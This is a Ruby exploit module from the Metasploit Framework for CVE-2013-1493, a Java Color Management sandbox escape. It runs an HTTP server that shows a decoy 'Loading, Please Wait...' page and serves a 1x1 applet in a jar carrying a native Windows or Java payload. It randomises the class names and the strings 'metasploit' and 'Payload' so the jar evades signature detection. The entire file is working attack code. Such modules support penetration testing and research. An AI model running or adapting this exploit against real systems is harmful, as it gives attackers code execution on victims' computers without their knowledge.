##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
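# Framework core and the Rex support library (HTTP server, zip/jar, text helpers).
require 'msf/core'
require 'rex'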
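class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::EXE
  include Msf::Exploit::Remote::BrowserAutopwn

  # BrowserAutopwn metadata: this module does not need JavaScript on the client.
  autopwn_info({ :javascript => false })

  # Module metadata. Target index 1 (Windows x86 native payload) is the default;
  # 'DefaultTarget' belongs in this info hash, not in the request handler.
  #
  # @param info [Hash] framework-supplied module info, merged via update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Java CMM Remote Code Execution',
      'Description'    => %q{
        This module abuses the Color Management classes from a Java Applet to run
        arbitrary Java code outside of the sandbox as exploited in the wild in February
        and March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
        and earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1
        systems. This exploit doesn't bypass click-to-play, so the user must accept the java
        warning in order to run the malicious applet.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown',     # Vulnerability discovery and Exploit
          'juan vazquez' # Metasploit module (just ported the published exploit)
        ],
      'References'     =>
        [
          [ 'CVE', '2013-1493' ],
          [ 'OSVDB', '90737' ],
          [ 'BID', '58238' ],
          [ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],
          [ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],
          [ 'URL', 'http://pastie.org/pastes/6581034' ]
        ],
      'Platform'       => [ 'win', 'java' ],
      'Payload'        => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
      'Targets'        =>
        [
          [ 'Generic (Java Payload)',
            {
              'Platform' => 'java',
              'Arch'     => ARCH_JAVA
            }
          ],
          [ 'Windows x86 (Native Payload)',
            {
              'Platform' => 'win',
              'Arch'     => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 1,
      'DisclosureDate' => 'Mar 01 2013'
    ))
  end

  # Loads the four pre-built class files bundled with the framework and picks a
  # random name for the applet entry class. The replacement name has exactly the
  # length of "Init" so the byte-for-byte substitution leaves the class file the
  # same size.
  #
  # @raise [Errno::ENOENT] if a bundled class file is missing from the install
  def setup
    @init_class           = read_bundled_class('Init.class')
    @leak_class           = read_bundled_class('Leak.class')
    @buffered_image_class = read_bundled_class('MyBufferedImage.class')
    @color_space_class    = read_bundled_class('MyColorSpace.class')

    @init_class_name = rand_text_alpha('Init'.length)
    @init_class.gsub!('Init', @init_class_name)
    super
  end

  # HTTP callback from the HttpServer mixin. Three URI shapes are handled:
  #   *.jar   -> the applet jar (payload jar plus the bundled class files)
  #   .../    -> the HTML page that embeds the applet
  #   other   -> redirect to the resource root
  #
  # @param cli     client connection supplied by the HttpServer mixin
  # @param request incoming request; only #uri is read here
  def on_request_uri(cli, request)
    print_status("handling request for #{request.uri}")

    case request.uri
    when /\.jar$/i
      send_response(cli, build_applet_jar, { 'Content-Type' => 'application/octet-stream' })
    when /\/$/
      # regenerate_payload yields a falsy value when no payload could be built
      # for this client; answer 404 rather than serve a page pointing at a jar
      # we cannot produce. The return value itself is not needed afterwards.
      unless regenerate_payload(cli)
        print_error('Failed to generate the payload.')
        send_not_found(cli)
        return
      end
      send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })
    else
      send_redirect(cli, get_resource + '/', '')
    end
  end

  # HTML page that loads the applet. The jar name is random per request; the
  # applet's code attribute must match the class name chosen in setup.
  #
  # @return [String] single-line HTML document
  def generate_html
    '<html><head><title>Loading, Please Wait...</title></head>' \
    '<body><center><p>Loading, Please Wait...</p></center>' \
    "<applet archive=\"#{rand_text_alpha(8)}.jar\" code=\"#{@init_class_name}.class\" width=\"1\" height=\"1\">" \
    '</applet></body></html>'
  end

  private

  # Reads one of the class files shipped under data/exploits/cve-2013-1493 as
  # binary.
  #
  # @param file_name [String] bare file name inside the exploit data directory
  # @return [String] raw file contents
  def read_bundled_class(file_name)
    path = File.join(Msf::Config.install_root, 'data', 'exploits', 'cve-2013-1493', file_name)
    File.binread(path)
  end

  # Builds the jar served for the applet tag: the encoded payload jar with the
  # four class files from setup added. Every entry name and body then has the
  # strings "metasploit" and "Payload" replaced by random alpha strings of the
  # same length, after which the manifest is rebuilt so it lists the new names.
  #
  # @return the jar object handed to send_response
  def build_applet_jar
    jar = payload.encoded_jar
    jar.add_file("#{@init_class_name}.class", @init_class)
    jar.add_file('Leak.class', @leak_class)
    jar.add_file('MyBufferedImage.class', @buffered_image_class)
    jar.add_file('MyColorSpace.class', @color_space_class)

    substitutions = {
      'metasploit' => rand_text_alpha('metasploit'.length),
      'Payload'    => rand_text_alpha('payload'.length)
    }
    jar.entries.each do |entry|
      substitutions.each do |from, to|
        entry.name.gsub!(from, to)
        entry.data = entry.data.gsub(from, to)
      end
    end
    jar.build_manifest
    jar
  end
end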